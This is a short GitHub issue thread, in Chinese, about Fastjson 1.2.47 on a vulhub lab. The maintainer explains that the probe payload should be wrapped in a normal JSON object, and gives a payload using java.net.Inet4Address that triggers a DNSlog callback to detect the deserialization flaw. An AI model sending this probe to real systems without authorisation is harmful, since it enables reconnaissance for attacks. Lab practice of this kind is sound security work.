### ISSUE TITLE
为什么vulhub的1.2.47，传json接收不到dnslog请求

### ISSUE THREAD

**Issue by lishixin7777** [lemono0/FastJsonParty#3]
<img width="616" alt="image" src="https://github.com/lemono0/FastJsonParty/assets/123936946/a99cbc83-33fa-4f10-b684-e6d9990020dd">

**Comment by lemono0** [comment]
有些代码里面限制了传输的格式是一个正常的对象，所以测试时最好都通过正常的格式将payload包裹
{
    "a":{
            "@type":"java.net.Inet4Address",
            "val":"dnslog"
         }
}
